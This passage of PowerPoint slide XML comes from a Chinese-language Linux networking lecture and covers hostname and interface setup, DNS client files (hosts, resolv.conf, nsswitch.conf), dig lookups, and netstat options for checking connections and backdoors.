              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>確認結果已經成功</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>修改過 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty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sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>裡面的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>HOSTNAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>後， 務必要重新開機。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0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8639" y="3631549"/>
            <a:ext cx="6826721" cy="2874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39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正向解析查看某個主機的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>IP:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>host www.googl.eom.tw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>www.googl.eom.tw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>手動</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>設定網卡內容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sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/network-scripts/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ifcfg-ethx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ifup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>eth0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>{interface}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ifdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> eth0{interface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>}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863640" y="2571840"/>
              <a:ext cx="1568880" cy="1461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47800" y="2508120"/>
                <a:ext cx="1600560" cy="27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844720" y="2698920"/>
              <a:ext cx="3264480" cy="159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28880" y="2635200"/>
                <a:ext cx="3296160" cy="28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46080" y="2076480"/>
              <a:ext cx="413280" cy="6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30240" y="2013120"/>
                <a:ext cx="4449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917720" y="1886040"/>
              <a:ext cx="3232440" cy="1591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901880" y="1822320"/>
                <a:ext cx="3264120" cy="28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筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1041480" y="3733920"/>
              <a:ext cx="2521080" cy="1018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25640" y="3670200"/>
                <a:ext cx="255312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筆跡 8"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1848600" y="1587240"/>
              <a:ext cx="633600" cy="460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832400" y="1523520"/>
                <a:ext cx="66564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1" name="筆跡 10"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5421240" y="1535040"/>
              <a:ext cx="529200" cy="262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405400" y="1471320"/>
                <a:ext cx="560880" cy="15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081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196752"/>
            <a:ext cx="8579296" cy="5400600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>DNS client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>端的設定</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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檔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最早</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>hostname </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>對應 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>記錄檔</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty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resolv.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>內容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:ISP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>伺服器 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>記錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vi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/>
              <a:t>resolv.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p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nsswitch.conf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容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>選擇使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty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hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty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resolv.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>作為參照組態檔。</a:t>
            </a:r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660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579296" cy="5402536"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>測</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>DNS client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>端的設定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# dig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>[options] FQDN [@server]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>選項與參數：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：如果不以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty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resolv.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的設定來作為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>查詢，可在此填入其他的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：相關的參數很多，主要有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>+trace, -t type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>以及 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>三者最常用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>trace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：就是從 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>根</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>DNS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>開始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>追蹤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>t type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：查詢的資料主要有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>mx, ns, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>soa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>類型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-x     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>  ：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>查詢反解資訊，非常重要的項目！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012320" y="1606680"/>
              <a:ext cx="2756880" cy="658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6480" y="1543320"/>
                <a:ext cx="278856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574280" y="2090160"/>
              <a:ext cx="54216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58080" y="2026440"/>
                <a:ext cx="57420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2108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測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>D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4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808" y="1196752"/>
            <a:ext cx="7647632" cy="523206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筆跡 5"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2468880" y="1560960"/>
              <a:ext cx="294480" cy="460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53040" y="1497600"/>
                <a:ext cx="3261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2926080" y="1600200"/>
              <a:ext cx="1868400" cy="131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910240" y="1536840"/>
                <a:ext cx="1900080" cy="25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4095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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>位置與測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>D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1" t="15904" r="33386" b="74699"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755576" y="1358767"/>
            <a:ext cx="5392149" cy="763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1" t="15904" r="9981" b="32794"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755576" y="2159594"/>
            <a:ext cx="7614814" cy="4005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755576" y="1358767"/>
            <a:ext cx="7920880" cy="7639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TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resolv.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DN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2122738"/>
            <a:ext cx="7920880" cy="40425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TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是否已經完成設定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089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zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查看本機網路連線與後門</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> -[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>rn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與路由有關的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>參數</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> -[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>antulpc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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與網路介面有關的參數</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與路由 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(route) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>有關的參數說明：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-r  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：列出路由表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(route table)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，功能如同 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>route </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這個指令；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-n  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：不使用主機名稱與服務名稱，使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>port number </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，如同 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>route -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>n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031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zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查看本機網路連線與後門</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與網路介面有關的參數：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-a  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：列出所有的連線狀態，包括 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> socket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-t  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：僅列出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>封包的連線；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-u  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：僅列出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>UDP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>封包的連線；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-l  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：僅列出有在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Listen (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>監聽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的服務之網路狀態；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-p  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：列出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>PID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的檔名；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-c  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：可以設定幾秒鐘後自動更新一次，例如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-c 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>每五秒更新一次網路狀態的顯示；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206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zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>列出目前所有網路連線狀態</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Port)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
